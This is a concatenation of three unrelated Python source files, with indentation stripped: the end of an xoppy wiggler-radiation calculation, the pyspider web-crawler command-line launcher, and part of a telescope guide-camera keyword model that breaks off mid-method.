# enerPoints = 1001,
# outFile = b'tmp.sha',
# elliptical = False)
#
# print(">>>>>",tmp)
gamma = ELECTRONENERGY / 512e-6
X = traj[0,:].copy()
Y = traj[1,:].copy()
Z = traj[1,:].copy()
divX = traj[3,:].copy()
divZ = traj[5,:].copy()
curX = traj[6,:].copy()
By = traj[7, :].copy()
# posX = divX * (distance + Y)
Ec = 665.0 * 3**2 * numpy.abs(By)
Ecmax = 665.0 * 3 ** 2 * numpy.abs(By.max())
sigmaBp = 0.597 / gamma * numpy.sqrt(Ecmax / PHOTONENERGYMIN)
divXX = numpy.linspace(divX.min() - 3 * sigmaBp, divX.max() + 3 * sigmaBp, HSLITPOINTS)
divZZ = numpy.linspace(-3 * sigmaBp, 3 * sigmaBp, VSLITPOINTS)
e = numpy.linspace(PHOTONENERGYMIN, PHOTONENERGYMAX, PHOTONENERGYPOINTS)
p = numpy.zeros( (PHOTONENERGYPOINTS, HSLITPOINTS, VSLITPOINTS) )
if PHOTONENERGYPOINTS > 3:
do_plot = False
else:
do_plot = True
for i in range(e.size):
Ephoton = e[i]
# horizontal divergence after Tanaka
if False:
e_over_ec = Ephoton / Ecmax
uudlim = 1.0 / gamma
print(">>>>>gamma",gamma)
uud = numpy.linspace(-uudlim*0.99, uudlim*0.99, divX.size)
uu = e_over_ec / numpy.sqrt(1 - gamma**2 * uud**2)
plot(uud, P(uu))
# vertical divergence
fluxDivZZ = srfunc.sync_ang(1,divZZ * 1e3,polarization=0,
e_gev=3,i_a=0.1,hdiv_mrad=1.0,energy=Ephoton, ec_ev=Ecmax)
if do_plot:
plot(divZZ, fluxDivZZ, title="min intensity %f" % fluxDivZZ.min(), xtitle="divZ", ytitle="fluxDivZZ", show=1)
# horizontal divergence
intensity = P(Ephoton / Ec)
fintensity = interp1d(divX, intensity, kind='linear', axis=-1, copy=True, bounds_error=False, fill_value=0.0,
assume_sorted=False)
intensity_interpolated = fintensity(divXX)
if True:
intensity_interpolated.shape = -1
fluxDivZZCC = srfunc.sync_ang(1, divXX * 1e3, polarization=0,
e_gev=3, i_a=0.1, hdiv_mrad=1.0, energy=Ephoton, ec_ev=Ecmax)
fluxDivZZCC.shape = -1
print(">>>>>>>", intensity_interpolated.shape, fluxDivZZCC.shape)
intensity_convolved = numpy.convolve(intensity_interpolated/intensity_interpolated.max(),
fluxDivZZCC/fluxDivZZCC.max(),
mode='same')
else:
intensity_convolved = intensity_interpolated
if do_plot:
plot(divX, intensity/intensity.max(),
divXX, intensity_interpolated/intensity_interpolated.max(),
divXX, intensity_convolved/intensity_convolved.max(),
title=">>>>> min intensity %f, Ephoton=%6.2f" % (intensity.min(), Ephoton), xtitle="divX", ytitle="intensity",
legend=["orig","interpolated","convolved"],show=1)
# combine H * V
INTENSITY = numpy.outer(intensity_convolved/intensity_convolved.max(), fluxDivZZ/fluxDivZZ.max())
print(">>>>", flux.shape, INTENSITY.shape, p.shape)
p[i,:,:] = INTENSITY / INTENSITY.sum() * flux[i]
if do_plot:
plot_image(INTENSITY, divXX, divZZ, aspect='auto', title="E=%6.2f" % Ephoton, show=1)
#
h = divXX * DISTANCE
v = divZZ * DISTANCE
if h5_file != "":
try:
if h5_initialize:
h5w = H5SimpleWriter.initialize_file(h5_file,creator="xoppy_wigglers.py")
else:
h5w = H5SimpleWriter(h5_file,None)
h5w.create_entry(h5_entry_name,nx_default=None)
h5w.add_stack(e,h,v,p,stack_name="Radiation",entry_name=h5_entry_name,
title_0="Photon energy [eV]",
title_1="X gap [mm]",
title_2="Y gap [mm]")
h5w.create_entry("parameters",root_entry=h5_entry_name,nx_default=None)
#TODO: open!
# for key in h5_parameters.keys():
# h5w.add_key(key,h5_parameters[key], entry_name=h5_entry_name+"/parameters")
print("File written to disk: %s"%h5_file)
except:
print("ERROR initializing h5 file")
return e, h, v, p
if __name__ == "__main__":
e, h, v, p = xoppy_calc_wiggler_radiation()
|
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-03-05 00:11:49
import os
import six
import time
import shutil
import logging
import logging.config
from six.moves import builtins
import click
import pyspider
from pyspider.database import connect_database
from pyspider.libs import utils
def read_config(ctx, param, value):
if not value:
return {}
import json
config = json.load(value)
ctx.default_map = config
return config
def connect_db(ctx, param, value):
if not value:
return
return utils.Get(lambda: connect_database(value))
def load_cls(ctx, param, value):
if isinstance(value, six.string_types):
return utils.load_object(value)
return value
def connect_rpc(ctx, param, value):
if not value:
return
try:
from six.moves import xmlrpc_client
except ImportError:
import xmlrpclib as xmlrpc_client
return xmlrpc_client.ServerProxy(value, allow_none=True)
@click.group(invoke_without_command=True)
@click.option('-c', '--config', callback=read_config, type=click.File('r'),
help='a json file with default values for subcommands. {"webui": {"port":5001}}')
@click.option('--debug', envvar='DEBUG', is_flag=True, help='debug mode')
@click.option('--queue-maxsize', envvar='QUEUE_MAXSIZE', default=100,
help='maxsize of queue')
@click.option('--taskdb', envvar='TASKDB', callback=connect_db,
help='database url for taskdb, default: sqlite')
@click.option('--projectdb', envvar='PROJECTDB', callback=connect_db,
help='database url for projectdb, default: sqlite')
@click.option('--resultdb', envvar='RESULTDB', callback=connect_db,
help='database url for resultdb, default: sqlite')
@click.option('--amqp-url', help='amqp url for rabbitmq, default: built-in Queue')
@click.option('--phantomjs-proxy', help="phantomjs proxy ip:port")
@click.option('--data-path', default='./data', help='data dir path')
@click.pass_context
def cli(ctx, **kwargs):
"""
A powerful spider system in python.
"""
logging.config.fileConfig(os.path.join(os.path.dirname(__file__), "logging.conf"))
# get db from env
for db in ('taskdb', 'projectdb', 'resultdb'):
if kwargs[db] is not None:
continue
if os.environ.get('MYSQL_NAME'):
kwargs[db] = utils.Get(lambda db=db: connect_database('mysql+%s://%s:%s/%s' % (
db, os.environ['MYSQL_PORT_3306_TCP_ADDR'],
os.environ['MYSQL_PORT_3306_TCP_PORT'], db)))
elif os.environ.get('MONGODB_NAME'):
kwargs[db] = utils.Get(lambda db=db: connect_database('mongodb+%s://%s:%s/%s' % (
db, os.environ['MONGODB_PORT_27017_TCP_ADDR'],
os.environ['MONGODB_PORT_27017_TCP_PORT'], db)))
elif ctx.invoked_subcommand == 'bench':
if kwargs['data_path'] == './data':
kwargs['data_path'] += '/bench'
shutil.rmtree(kwargs['data_path'], ignore_errors=True)
os.mkdir(kwargs['data_path'])
if db in ('taskdb', 'resultdb'):
kwargs[db] = utils.Get(lambda db=db: connect_database('sqlite+%s://' % (db)))
else:
kwargs[db] = utils.Get(lambda db=db: connect_database('sqlite+%s:///%s/%s.db' % (
db, kwargs['data_path'], db[:-2])))
else:
if not os.path.exists(kwargs['data_path']):
os.mkdir(kwargs['data_path'])
kwargs[db] = utils.Get(lambda db=db: connect_database('sqlite+%s:///%s/%s.db' % (
db, kwargs['data_path'], db[:-2])))
# queue
if kwargs.get('amqp_url'):
from pyspider.libs.rabbitmq import Queue
for name in ('newtask_queue', 'status_queue', 'scheduler2fetcher',
'fetcher2processor', 'processor2result'):
kwargs[name] = utils.Get(lambda name=name: Queue(name, amqp_url=kwargs['amqp_url'],
maxsize=kwargs['queue_maxsize']))
elif os.environ.get('RABBITMQ_NAME'):
from pyspider.libs.rabbitmq import Queue
amqp_url = ("amqp://guest:guest@%(RABBITMQ_PORT_5672_TCP_ADDR)s"
":%(RABBITMQ_PORT_5672_TCP_PORT)s/%%2F" % os.environ)
for name in ('newtask_queue', 'status_queue', 'scheduler2fetcher',
'fetcher2processor', 'processor2result'):
kwargs[name] = utils.Get(lambda name=name: Queue(name, amqp_url=amqp_url,
maxsize=kwargs['queue_maxsize']))
else:
from multiprocessing import Queue
for name in ('newtask_queue', 'status_queue', 'scheduler2fetcher',
'fetcher2processor', 'processor2result'):
kwargs[name] = Queue(kwargs['queue_maxsize'])
# phantomjs-proxy
if kwargs.get('phantomjs_proxy'):
pass
elif os.environ.get('PHANTOMJS_NAME'):
kwargs['phantomjs_proxy'] = os.environ['PHANTOMJS_PORT'][len('tcp://'):]
ctx.obj = utils.ObjectDict(ctx.obj or {})
ctx.obj['instances'] = []
ctx.obj.update(kwargs)
if ctx.invoked_subcommand is None and not ctx.obj.get('testing_mode'):
ctx.invoke(all)
return ctx
@cli.command()
@click.option('--xmlrpc/--no-xmlrpc', default=True)
@click.option('--xmlrpc-host', default='0.0.0.0')
@click.option('--xmlrpc-port', envvar='SCHEDULER_XMLRPC_PORT', default=23333)
@click.option('--inqueue-limit', default=0,
help='size limit of task queue for each project, '
'tasks will been ignored when overflow')
@click.option('--delete-time', default=24 * 60 * 60,
help='delete time before marked as delete')
@click.option('--active-tasks', default=100, help='active log size')
@click.option('--loop-limit', default=1000, help='maximum number of tasks due with in a loop')
@click.option('--scheduler-cls', default='pyspider.scheduler.Scheduler', callback=load_cls,
help='scheduler class to be used.')
@click.pass_context
def scheduler(ctx, xmlrpc, xmlrpc_host, xmlrpc_port,
inqueue_limit, delete_time, active_tasks, loop_limit, scheduler_cls):
g = ctx.obj
Scheduler = load_cls(None, None, scheduler_cls)
scheduler = Scheduler(taskdb=g.taskdb, projectdb=g.projectdb, resultdb=g.resultdb,
newtask_queue=g.newtask_queue, status_queue=g.status_queue,
out_queue=g.scheduler2fetcher, data_path=g.get('data_path', 'data'))
scheduler.INQUEUE_LIMIT = inqueue_limit
scheduler.DELETE_TIME = delete_time
scheduler.ACTIVE_TASKS = active_tasks
scheduler.LOOP_LIMIT = loop_limit
g.instances.append(scheduler)
if g.get('testing_mode'):
return scheduler
if xmlrpc:
utils.run_in_thread(scheduler.xmlrpc_run, port=xmlrpc_port, bind=xmlrpc_host)
scheduler.run()
@cli.command()
@click.option('--xmlrpc/--no-xmlrpc', default=False)
@click.option('--xmlrpc-host', default='0.0.0.0')
@click.option('--xmlrpc-port', envvar='FETCHER_XMLRPC_PORT', default=24444)
@click.option('--poolsize', default=100, help="max simultaneous fetches")
@click.option('--proxy', help="proxy host:port")
@click.option('--user-agent', help='user agent')
@click.option('--timeout', help='default fetch timeout')
@click.option('--fetcher-cls', default='pyspider.fetcher.Fetcher', callback=load_cls,
help='Fetcher class to be used.')
@click.pass_context
def fetcher(ctx, xmlrpc, xmlrpc_host, xmlrpc_port, poolsize, proxy, user_agent,
timeout, fetcher_cls):
g = ctx.obj
Fetcher = load_cls(None, None, fetcher_cls)
fetcher = Fetcher(inqueue=g.scheduler2fetcher, outqueue=g.fetcher2processor,
poolsize=poolsize, proxy=proxy)
fetcher.phantomjs_proxy = g.phantomjs_proxy
if user_agent:
fetcher.user_agent = user_agent
if timeout:
fetcher.default_options = dict(fetcher.default_options)
fetcher.default_options['timeout'] = timeout
g.instances.append(fetcher)
if g.get('testing_mode'):
return fetcher
if xmlrpc:
utils.run_in_thread(fetcher.xmlrpc_run, port=xmlrpc_port, bind=xmlrpc_host)
fetcher.run()
@cli.command()
@click.option('--processor-cls', default='pyspider.processor.Processor', callback=load_cls,
help='Processor class to be used.')
@click.pass_context
def processor(ctx, processor_cls):
g = ctx.obj
Processor = load_cls(None, None, processor_cls)
processor = Processor(projectdb=g.projectdb,
inqueue=g.fetcher2processor, status_queue=g.status_queue,
newtask_queue=g.newtask_queue, result_queue=g.processor2result)
g.instances.append(processor)
if g.get('testing_mode'):
return processor
processor.run()
@cli.command()
@click.option('--result-cls', default='pyspider.result.ResultWorker', callback=load_cls,
help='ResultWorker class to be used.')
@click.pass_context
def result_worker(ctx, result_cls):
g = ctx.obj
ResultWorker = load_cls(None, None, result_cls)
result_worker = ResultWorker(resultdb=g.resultdb, inqueue=g.processor2result)
g.instances.append(result_worker)
if g.get('testing_mode'):
return result_worker
result_worker.run()
@cli.command()
@click.option('--host', default='0.0.0.0', envvar='WEBUI_HOST',
help='webui bind to host')
@click.option('--port', default=5000, envvar='WEBUI_PORT',
help='webui bind to host')
@click.option('--cdn', default='//cdnjscn.b0.upaiyun.com/libs/',
help='js/css cdn server')
@click.option('--scheduler-rpc', callback=connect_rpc, help='xmlrpc path of scheduler')
@click.option('--fetcher-rpc', callback=connect_rpc, help='xmlrpc path of fetcher')
@click.option('--max-rate', type=float, help='max rate for each project')
@click.option('--max-burst', type=float, help='max burst for each project')
@click.option('--username', envvar='WEBUI_USERNAME',
help='username of lock -ed projects')
@click.option('--password', envvar='WEBUI_PASSWORD',
help='password of lock -ed projects')
@click.option('--need-auth', default=False, help='need username and password')
@click.option('--fetcher-cls', default='pyspider.fetcher.Fetcher', callback=load_cls,
help='Fetcher class to be used.')
@click.option('--webui-instance', default='pyspider.webui.app.app', callback=load_cls,
help='webui Flask Application instance to be used.')
@click.pass_context
def webui(ctx, host, port, cdn, scheduler_rpc, fetcher_rpc, max_rate, max_burst,
username, password, need_auth, fetcher_cls, webui_instance):
app = load_cls(None, None, webui_instance)
Fetcher = load_cls(None, None, fetcher_cls)
g = ctx.obj
app.config['taskdb'] = g.taskdb
app.config['projectdb'] = g.projectdb
app.config['resultdb'] = g.resultdb
app.config['cdn'] = cdn
if max_rate:
app.config['max_rate'] = max_rate
if max_burst:
app.config['max_burst'] = max_burst
if username:
app.config['webui_username'] = username
if password:
app.config['webui_password'] = password
# fetcher rpc
if isinstance(fetcher_rpc, six.string_types):
fetcher_rpc = connect_rpc(ctx, None, fetcher_rpc)
if fetcher_rpc is None:
fetcher = Fetcher(inqueue=None, outqueue=None, async=False)
fetcher.phantomjs_proxy = g.phantomjs_proxy
app.config['fetch'] = lambda x: fetcher.fetch(x)[1]
else:
import umsgpack
app.config['fetch'] = lambda x: umsgpack.unpackb(fetcher_rpc.fetch(x).data)
if isinstance(scheduler_rpc, six.string_types):
scheduler_rpc = connect_rpc(ctx, None, scheduler_rpc)
if scheduler_rpc is None and os.environ.get('SCHEDULER_NAME'):
app.config['scheduler_rpc'] = connect_rpc(ctx, None, 'http://%s/' % (
os.environ['SCHEDULER_PORT_23333_TCP'][len('tcp://'):]))
elif scheduler_rpc is None:
app.config['scheduler_rpc'] = connect_rpc(ctx, None, 'http://localhost:23333/')
else:
app.config['scheduler_rpc'] = scheduler_rpc
app.debug = g.debug
g.instances.append(app)
if g.get('testing_mode'):
return app
app.run(host=host, port=port)
@cli.command()
@click.option('--phantomjs-path', default='phantomjs', help='phantomjs path')
@click.option('--port', default=25555, help='phantomjs port')
@click.pass_context
def phantomjs(ctx, phantomjs_path, port):
import subprocess
g = ctx.obj
phantomjs_fetcher = os.path.join(
os.path.dirname(pyspider.__file__), 'fetcher/phantomjs_fetcher.js')
try:
_phantomjs = subprocess.Popen([phantomjs_path,
phantomjs_fetcher,
str(port)])
except OSError:
return None
def quit(*args, **kwargs):
_phantomjs.kill()
_phantomjs.wait()
logging.info('phantomjs existed.')
phantomjs = utils.ObjectDict(port=port, quit=quit)
g.instances.append(phantomjs)
if g.get('testing_mode'):
return phantomjs
_phantomjs.wait()
@cli.command()
@click.option('--fetcher-num', default=1, help='instance num of fetcher')
@click.option('--processor-num', default=1, help='instance num of processor')
@click.option('--result-worker-num', default=1,
help='instance num of result worker')
@click.option('--run-in', default='subprocess', type=click.Choice(['subprocess', 'thread']),
help='run each components in thread or subprocess. '
'always using thread for windows.')
@click.pass_context
def all(ctx, fetcher_num, processor_num, result_worker_num, run_in):
ctx.obj['debug'] = False
g = ctx.obj
if run_in == 'subprocess' and os.name != 'nt':
run_in = utils.run_in_subprocess
else:
run_in = utils.run_in_thread
threads = []
# phantomjs
g['testing_mode'] = True
phantomjs_config = g.config.get('phantomjs', {})
phantomjs_obj = ctx.invoke(phantomjs, **phantomjs_config)
if phantomjs_obj and not g.get('phantomjs_proxy'):
g['phantomjs_proxy'] = 'localhost:%s' % phantomjs_obj.port
g['testing_mode'] = False
# result worker
result_worker_config = g.config.get('result_worker', {})
for i in range(result_worker_num):
threads.append(run_in(ctx.invoke, result_worker, **result_worker_config))
# processor
processor_config = g.config.get('processor', {})
for i in range(processor_num):
threads.append(run_in(ctx.invoke, processor, **processor_config))
# fetcher
fetcher_config = g.config.get('fetcher', {})
fetcher_config.setdefault('xmlrpc_host', '127.0.0.1')
for i in range(fetcher_num):
threads.append(run_in(ctx.invoke, fetcher, **fetcher_config))
# scheduler
scheduler_config = g.config.get('scheduler', {})
scheduler_config.setdefault('xmlrpc_host', '127.0.0.1')
threads.append(run_in(ctx.invoke, scheduler, **scheduler_config))
# running webui in main thread to make it exitable
webui_config = g.config.get('webui', {})
webui_config.setdefault('scheduler_rpc', 'http://localhost:%s/'
% g.config.get('scheduler', {}).get('xmlrpc_port', 23333))
ctx.invoke(webui, **webui_config)
# exit components run in threading
for each in g.instances:
each.quit()
# exit components run in subprocess
for each in threads:
if not each.is_alive():
continue
if hasattr(each, 'terminate'):
each.terminate()
each.join()
@cli.command()
@click.option('--fetcher-num', default=1, help='instance num of fetcher')
@click.option('--processor-num', default=2, help='instance num of processor')
@click.option('--result-worker-num', default=1, help='instance num of result worker')
@click.option('--run-in', default='subprocess', type=click.Choice(['subprocess', 'thread']),
help='run each components in thread or subprocess. '
'always using thread for windows.')
@click.option('--total', default=10000, help="total url in test page")
@click.option('--show', default=20, help="show how many urls in a page")
@click.pass_context
def bench(ctx, fetcher_num, processor_num, result_worker_num, run_in, total, show):
from pyspider.libs import bench
from pyspider.webui import bench_test
bench_test # make pyflake happy
ctx.obj['debug'] = False
g = ctx.obj
if result_worker_num == 0:
g['processor2result'] = None
if run_in == 'subprocess' and os.name != 'nt':
run_in = utils.run_in_subprocess
else:
run_in = utils.run_in_thread
g.projectdb.insert('bench', {
'name': 'bench',
'status': 'RUNNING',
'script': bench.bench_script % {'total': total, 'show': show},
'rate': total,
'burst': total,
'updatetime': time.time()
})
# disable log
logging.getLogger().setLevel(logging.ERROR)
logging.getLogger('scheduler').setLevel(logging.ERROR)
logging.getLogger('fetcher').setLevel(logging.ERROR)
logging.getLogger('processor').setLevel(logging.ERROR)
logging.getLogger('result').setLevel(logging.ERROR)
logging.getLogger('webui').setLevel(logging.ERROR)
threads = []
# result worker
result_worker_config = g.config.get('result_worker', {})
for i in range(result_worker_num):
threads.append(run_in(ctx.invoke, result_worker,
result_cls='pyspider.libs.bench.BenchResultWorker',
**result_worker_config))
# processor
processor_config = g.config.get('processor', {})
for i in range(processor_num):
threads.append(run_in(ctx.invoke, processor,
processor_cls='pyspider.libs.bench.BenchProcessor',
**processor_config))
# fetcher
fetcher_config = g.config.get('fetcher', {})
fetcher_config.setdefault('xmlrpc_host', '127.0.0.1')
for i in range(fetcher_num):
threads.append(run_in(ctx.invoke, fetcher,
fetcher_cls='pyspider.libs.bench.BenchFetcher',
**fetcher_config))
# scheduler
scheduler_config = g.config.get('scheduler', {})
scheduler_config.setdefault('xmlrpc_host', '127.0.0.1')
threads.append(run_in(ctx.invoke, scheduler,
scheduler_cls='pyspider.libs.bench.BenchScheduler',
**scheduler_config))
# webui
webui_config = g.config.get('webui', {})
webui_config.setdefault('scheduler_rpc', 'http://localhost:%s/'
% g.config.get('scheduler', {}).get('xmlrpc_port', 23333))
threads.append(run_in(ctx.invoke, webui, **webui_config))
# run project
time.sleep(1)
import requests
rv = requests.post('http://localhost:5000/run', data={
'project': 'bench',
})
assert rv.status_code == 200, 'run project error'
# wait bench test finished
while True:
time.sleep(1)
if builtins.all(getattr(g, x) is None or getattr(g, x).empty() for x in (
'newtask_queue', 'status_queue', 'scheduler2fetcher',
'fetcher2processor', 'processor2result')):
break
# exit components run in threading
for each in g.instances:
each.quit()
# exit components run in subprocess
for each in threads:
if hasattr(each, 'terminate'):
each.terminate()
each.join(1)
def main():
cli()
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
"""Model for guide cameras.
Warning: the config stuff will probably be modified.
2005-01-28 ROwen preliminary; has all existing keywords, but there will be more
and "star" will probably change to include ellipticity.
2005-02-23 ROwen added expTime and thresh.
2005-03-14 ROwen overhauled for new keywords
2005-03-30 ROwen overhauled again for new keywords files and star keywords.
2005-04-11 ROwen Renamed to GuideModel from GCamModel (because an actor is named gcam).
2005-04-13 ROwen Bug fix: was refreshing all keywords. Was refreshing nonexistent keyword time.
2005-04-20 ROwen Removed expTime; get from FITS header instead.
Added default exposure time and bin factor to camInfo.
Tweaked description of fs...Thresh keywords, since they now
also apply to centroid.
2005-06-08 ROwen Added noStarsFound and starQuality.
2005-06-10 ROwen Added playing of sound cues.
Renamed noStarsFound to noGuideStar.
Modified starQuality to accept additional values.
2005-06-17 ROwen Guide start/stop sounds only play if the state has changed.
Thus one can quietly ask for guide status.
2005-06-23 ROwen Modified to not play NoGuideStar sound unless the keyword is "genuine".
This is mostly paranoia since it's not auto-refreshed anyway.
2005-06-27 ROwen Changed default bin factor from 3 to 1 for the DIS and Echelle slitviewers.
2005-07-08 ROwen Modified for http download:
- Changed ftpLogWdg to downloadWdg.
- Removed imageRoot.
2005-08-02 ROwen Modified for TUI.Sounds->TUI.PlaySound.
2005-10-24 ROwen Lowered default min exposure time to 0 sec.
2006-03-28 ROwen Added "nfocus" actor.
Added guideMode keyword.
Bug fix: fsActRadMult was listening for fsDefRadMult.
2006-04-14 ROwen Added locGuideMode.
Play a sound when locGuideMode changes while guiding.
2006-05-18 ROwen Added measOffset and actOffset.
Added support for predicted position for star="g"...
Added support for NaN in star values.
2006-05-22 ROwen Changed the default exposure time from 10 to 5 seconds
by request of the obs specs.
2006-03-03 ROwen Added imSize to gcamInfo. This may be a temporary hack,
since it would be better to get the info from the hub.
2007-01-29 ROwen Bug fix: guiding sound cues were not always played because
"starting" and perhaps "stopping" states were not always sent.
2007-06-05 ROwen Added "sfocus" actor.
2008-02-04 ROwen Added locGuideStateSummary.
2008-03-14 ROwen Added tcam actor.
2008-03-17 ROwen Bug fix: tcam was not listed as a slitviewer.
2008-03-25 ROwen PR 744: changed default nfocus exposure time to 6 seconds.
2008-04-01 ROwen Bug fix: _updLocGuideModeSummary mis-handled a mode of None.
2008-04-22 ROwen Added expState.
2008-04-23 ROwen Get expState from the cache (finally) but null out the times.
Modified expState so durations can be None or 0 for unknown (was just 0).
2008-07-24 ROwen Fixed CR 851: changed tcam default bin factor to 2 (from 1).
2010-03-04 ROwen Changed gcam info field slitViewer to isSlitViewer.
2010-03-18 ROwen Added "afocus" actor.
2010-10-20 ROwen Modified to not auto-refresh expState keyvar for focus actors; expState isn't
output by focus actors, but it's more consistent to leave it in with a null value.
2012-08-10 ROwen Updated for RO.Comm 3.0.
2015-06-01 ROwen Updated for new dcam, which has size 1024x1024 instead of 512x512.
2015-11-05 ROwen Changed ==/!= True/False to is/is not True/False to modernize the code.
"""
__all__ = ['getModel']
import RO.CnvUtil
import RO.KeyVariable
import TUI.TUIModel
import TUI.PlaySound
class _GCamInfo:
"""Exposure information for a camera
Inputs:
- min/maxExpTime: minimum and maximum exposure time (sec)
- isSlitViewer: True if a slit viewer
"""
def __init__(self,
imSize,
minExpTime = 0.0,
maxExpTime = 3600,
defBinFac = 1,
defExpTime = 5,
isSlitViewer = False,
):
self.imSize = imSize
self.minExpTime = float(minExpTime)
self.maxExpTime = float(maxExpTime)
self.defBinFac = defBinFac
self.defExpTime = defExpTime
self.isSlitViewer = bool(isSlitViewer)
# dictionary of instrument information
# instrument names must be lowercase
_GCamInfoDict = {
"dcam": _GCamInfo(
imSize = (1024, 1024),
minExpTime = 0.3,
isSlitViewer = True,
),
"ecam": _GCamInfo(
imSize = (512, 512),
isSlitViewer = True,
),
"gcam": _GCamInfo(
imSize = (1024, 1024),
defBinFac = 3,
),
"tcam":_GCamInfo(
imSize = (1024, 1024),
isSlitViewer = True,
defBinFac = 2,
),
"afocus":_GCamInfo(
imSize = (1024, 1024),
),
"nfocus":_GCamInfo(
imSize = (1024, 1024),
defExpTime = 6,
),
"sfocus":_GCamInfo(
imSize = (2048, 2048),
),
}
# cache of guide camera models
# each entry is gcamName: model
_modelDict = {}
def getModel(gcamName):
global _modelDict
gcamNameLow = gcamName.lower()
model = _modelDict.get(gcamNameLow)
if model is None:
model = Model(gcamName)
_modelDict[gcamNameLow] = model
return model
def modelIter():
for gcamName in _GCamInfoDict.iterkeys():
yield getModel(gcamName)
class Model (object):
def __init__(self, gcamName):
self.gcamName = gcamName
self.actor = gcamName.lower()
self._isGuiding = None
self._isFocusActor = self.actor.endswith("focus")
self.gcamInfo = _GCamInfoDict[self.actor]
self.tuiModel = TUI.TUIModel.getModel()
keyVarFact = RO.KeyVariable.KeyVarFactory(
actor = self.actor,
dispatcher = self.tuiModel.dispatcher,
converters = str,
allowRefresh = True,
)
self.expState = keyVarFact(
keyword = "expState",
converters = (str, str, RO.CnvUtil.asFloatOrNone, RO.CnvUtil.asFloatOrNone),
description = """current exposure info:
- exposure state; one of: idle, flushing, integrating, paused,
reading, processing, aborting, done or aborted.
- start time (an ANSI-format UTC timestamp)
- remaining time for this state (sec; 0 or None if short or unknown)
- total time for this state (sec; 0 or None if short or unknown)
Note: if the data is cached then remaining time and total time
are changed to 0 to indicate that the values are unknown
""",
allowRefresh = not self._isFocusActor,
)
self.expState.addCallback(self._updExpState)
# keywords for parameters
self.fsActRadMult = keyVarFact(
keyword="fsActRadMult",
converters = RO.CnvUtil.asFloat,
description="""Actual findStars radius multiplier""",
allowRefresh = False,
)
self.fsActThresh = keyVarFact(
keyword="fsActThresh",
converters = RO.CnvUtil.asFloat,
description="""Actual findStars and centroid threshold (sigma)""",
allowRefresh = False,
)
self.fsDefRadMult = keyVarFact(
keyword="fsDefRadMult",
converters = RO.CnvUtil.asFloat,
description="""Default findStars radius multiplier""",
)
self.fsDefThresh = keyVarFact(
keyword="fsDefThresh",
converters = RO.CnvUtil.asFloat,
description="""Default findStars and centroid threshold (sigma)""",
)
self.files = keyVarFact(
keyword="files",
nval = (5, None),
converters = (str, RO.CnvUtil.asBool, str),
description="""Image used for command:
- command: one of: c (centroid), f (findStars) or g (guiding)
- isNew: 1 if a new file, 0 if an existing file
- baseDir: base directory for these files (relative to image root)
- finalFile: image file (with any processing)
- maskFile: mask file
other values may be added
""",
allowRefresh = False,
)
self.guideState = keyVarFact(
keyword="guideState",
nval=(1,None),
description="""State of guide actor. Fields are:
- mainState: one of: on, starting, stopping, off
any remaining fields are supplementary info
""",
)
self.guideState.addIndexedCallback(self._updGuideState)
self.locGuideMode = keyVarFact(
keyword="locGuideMode",
description="""like guideMode, but restricted to one of:
field, boresight, manual, "" or None
and lowercase is guaranteed""",
isLocal = True,
)
self.locGuideStateSummary = keyVarFact(
keyword = "locGuideStateSummary",
nval=1,
description = """Summary of state of guide actor; one of: on, off, starting, stopping, manual
where manual means guide state = on and guide mode = manual
""",
isLocal = True,
)
self.guideMode = keyVarFact(
keyword="guideMode",
description="one of: field, boresight or manual or some other values",
)
self.guideMode.addIndexedCallback(self._updGuideMode)
self.star = keyVarFact(
keyword="star",
nval = (15,17),
converters = (str, int, RO.CnvUtil.asFloatOrNone),
description="""Data about a star.
The fields are as follows, where lengths and positions are in binned pixels
and intensities are in ADUs:
0 type characer: c = centroid, f = findstars, g = guide star
1 index: an index identifying the star within the list of stars returned by the command.
2,3 x,yCenter: centroid
4,5 x,yError: estimated standard deviation of x,yCenter
6 radius: radius of centroid region
7 asymmetry: a measure of the asymmetry of the object;
the value minimized by PyGuide.centroid.
Warning: not normalized, so probably not much use.
8 FWHM major
9 FWHM minor
10 ellMajAng: angle of ellipse major axis in x,y frame (deg)
11 chiSq: goodness of fit to model star (a double gaussian). From PyGuide.starShape.
12 counts: sum of all unmasked pixels within the centroid radius. From PyGuide.centroid
13 background: background level of fit to model star. From PyGuide.starShape
14 amplitude: amplitude of fit to model star. From PyGuide.starShape
For "g" stars, the two following fields are added:
15,16 predicted x,y position
""",
allowRefresh = False,
)
self.measOffset = keyVarFact(
keyword="measOffset",
nval = 2,
converters = float,
description="""The measured offset of the guidestar from its predicted position, in az/alt arcseconds. See also actOffset.""",
allowRefresh = False,
)
self.actOffset = keyVarFact(
keyword="actOffset",
nval = 2,
converters = float,
description="""The offset that willl be sent to the TCC, in az/alt arcseconds. This is measOffset adjusted as the hub guider sees fit.""",
allowRefresh = False,
)
self.noGuideStar = keyVarFact(
keyword="NoGuideStar",
nval = 0,
description="Guide loop found no stars.",
allowRefresh = False,
)
self.noGuideStar.addCallback(self._updNoGuideStar)
self.starQuality = keyVarFact(
keyword="StarQuality",
nval = (1, None),
converters = RO.CnvUtil.asFloatOrNone,
description="""Guide iteration centroid quality.
0 overall quality; a value between 0 and 1
additional fields may be used for components of star quality
""",
allowRefresh = False,
)
keyVarFact.setKeysRefreshCmd()
self.ftpSaveToPref = self.tuiModel.prefs.getPrefVar("Save To")
downloadTL = self.tuiModel.tlSet.getToplevel("TUI.Downloads")
self.downloadWdg = downloadTL and downloadTL.getWdg()
def _updLocGuideModeSummary(self):
"""Compute new local guide mode summary"""
guideState, gsCurr = self.guideState.getInd(0)
if guideState is None:
return
if guideState.lower() != "on":
self.locGuideStateSummary.set((guideState,), isCurrent = gsCurr)
return
guideMode, gmCurr = self.locGuideMode.getInd(0)
if guideMode == "manual":
self.locGuideStateSummary.set((guideMode,), isCurrent = gsCurr and gmCurr)
else:
self.locGuideStateSummary.set((guideState,), isCurrent = gsCurr)
def _updGuideMode(self, guideMode, isCurrent, **kargs):
"""Handle new guideMode.
Set locGuideMode and play "Guide Mode Changed"
as appropriate.
"""
if not guideMode:
self.locGuideMode.set((None,), isCurrent = isCurrent)
return
gmLower = guideMode.lower()
if gmLower not in ("boresight", "field", "manual", None):
return
if gmLower and isCurrent:
guideState, gsIsCurrent = self.guideState.getInd(0)
locGuideMode, lgmIsCurrent = self.locGuideMode.getInd(0)
if guideState and gsIsCurrent and \
locGuideMode and lgmIsCurrent and \
(gmLower != locGuideMode) and \
(guideState.lower() == "on"):
